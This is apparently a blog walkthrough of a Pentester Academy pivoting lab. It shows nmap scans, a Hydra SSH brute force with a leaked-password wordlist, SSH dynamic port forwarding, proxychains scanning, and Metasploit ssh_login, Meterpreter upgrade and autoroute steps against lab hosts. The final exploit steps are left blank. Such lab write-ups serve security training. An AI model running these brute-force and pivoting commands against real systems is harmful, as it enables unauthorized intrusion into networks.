Home Pivoting VII
Post
Cancel

Pivoting VII

Posted Jun 6, 2022 Updated Apr 15, 2023
By
2 min read

Pivoting VII

Steps Taken:

1. Scan the target machine with NMAP:

1

nmap -sV --script=banner {target-ip}

2. Use Hydra to brute force the credentials since SSH is available:

1

hydra {target-ip-internal-network} ssh -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V

3. Create a Dynamic Port Forwarding on this SSH session through the first compromised machine:

1

ssh -D 9050 root@{target-ip}

4. Make sure that the port forwarding is actually enabled by checking it using:

1

netstat -tpln

on another terminal session and NOT on the same session where the SSH login was done.

5. Do NMAP with Proxychains on this:

1
2

proxychains nmap -sT -Pn {target-ip-internal} -v
		- This shows the open ports are ports 139 and 445 on the target machine inside the internal network

#### 6. Reviewing from the previous pivoting labs, we use “exploit/linux/…/is_pipe…” exploit. Let’s try that one in this lab as well.

1
2
3
4
5
6

	- We can't execute the metasploit exploit in here since we need autoroute to create a pivot in this compromised machine, but how do you do that with this given SSH session?


	- First, we need to setup the database for Metasploit: ```bash service postgresql start msfdb init msfconsole -q msf > db_status ```

	- Second, use "auxiliary/scanner/ssh/ssh_login". This is used to create a Metasploit sessions on this SSH session! In this way, we can create a pivot using "autoroute" in Metasploit with this SSH session. In this case, there would be NO NEED FOR THE DYNAMIC PORT FORWARDING since we need to use exploit from Metasploit in the first place. ```bash msf > use auxiliary/scanner/ssh/ssh_login msf > set RHOSTS 192.30.160.3 msf > set USERNAME root msf > set PASSWORD 1234567890 msf > exploit ```

Reference: https://nullsweep.com/pivot-cheatsheet-for-pentesters/

1
2
3

- See another session created? Now you can upgrade this to Meterpreter!

	msf > sessions -u 1

7. Now, create the pivot on this compromised machine with SSH session:

1

- Note that if there would be a way for us to send the exploit through the dynamic port forwarding with just SSH, we wouldn't need to use Metasploit to create a pivot and then send the exploit.

8. In this case, we use the same exploit for Samba as from previous labs since using different exploit seems to be not the point of the box:

9. Get the flag:

Pentesting, Pivoting
Pentester Academy Metasploit
This post is licensed under CC BY 4.0 by the author.
Recently Updated